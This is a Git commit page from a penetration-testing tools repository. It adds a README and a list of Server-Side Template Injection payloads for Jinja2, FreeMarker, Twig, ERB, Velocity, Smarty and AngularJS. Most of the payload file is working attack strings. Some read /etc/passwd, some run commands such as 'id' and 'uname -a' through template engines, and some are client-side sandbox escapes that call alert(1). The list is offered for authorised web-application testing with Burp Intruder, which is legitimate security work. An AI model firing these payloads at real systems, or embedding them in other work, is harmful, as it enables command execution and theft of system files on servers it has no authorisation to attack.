Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-02 01:58:33 +02:00
Code Issues Packages Projects Releases Wiki Activity

Dropped a bunch of various scripts.

Browse Source
This commit is contained in:
mb
2019-01-29 05:19:12 -05:00
parent e839e64db2
commit 1bf88bef0b
9 changed files with 105 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
web/payloads/README.md Normal file
View File

@ -0,0 +1,4 @@
## Web Applications penetration testing related PAYLOADS that are actually useful
- **`Server-Side-Template-Injections.txt`** - Various Server-Side Template Injection static payloads, targeting couple of various templating implementations (also some of the Client-Side ones like in AngularJS). The evaluated expression to look/grep for is: **1868686868**. Use it with Burp Intruder's Grep functionality, or simply look out for that pattern while hanging around the application. ([gist](https://gist.github.com/mgeeky/2b660ab8d3946eec519731ed9ec5d25b))

45
web/payloads/Server-Side-Template-Injections.txt Executable file
View File

@ -0,0 +1,45 @@
##### LOOK FOR 1868686868
<%= 666 * 666 %>
<%= File.open('/etc/passwd').read %>
${36692*50929}
aaaaaaaaaaaaaaaaaaaaaa{*cccccccccccccccccccccccccccccccc*}bbbbbbbbbbbbbbbbbbbbbbbbb
${"aaaaaaaaaaaaaaaaaaaaaa".join("bbbbbbbbbbbbbbbbbbbbbbbbb")}
${36692*'50929'}
${{36692*50929}}
${{36692*'50929'}}
{{36692*'50929'}}
{{36692*50929}}
[[36692*50929]]
${{36692*50929}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
{{self}}
{php}echo 36692*50929;{/php}
{{velocity}}36692*50929;{{/velocity}}
{{python}}36692*50929;{{/python}}
<#assign
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
= root
= 36692 * 50929
<% x=36692*50929 %>${x}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
aaaaaaaaaaaaaaaaaaaaaa{{''.__class__.__mro__[2].__subclasses__()[233]}}bbbbbbbbbbbbbbbbbbbbbbbbb
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("uname+-a")}}
$class
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo.class
${fffffffffffffffffffffff}
{{ffffffffffffffffffff}}
[[ffffffffffffffffffffff]]
{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}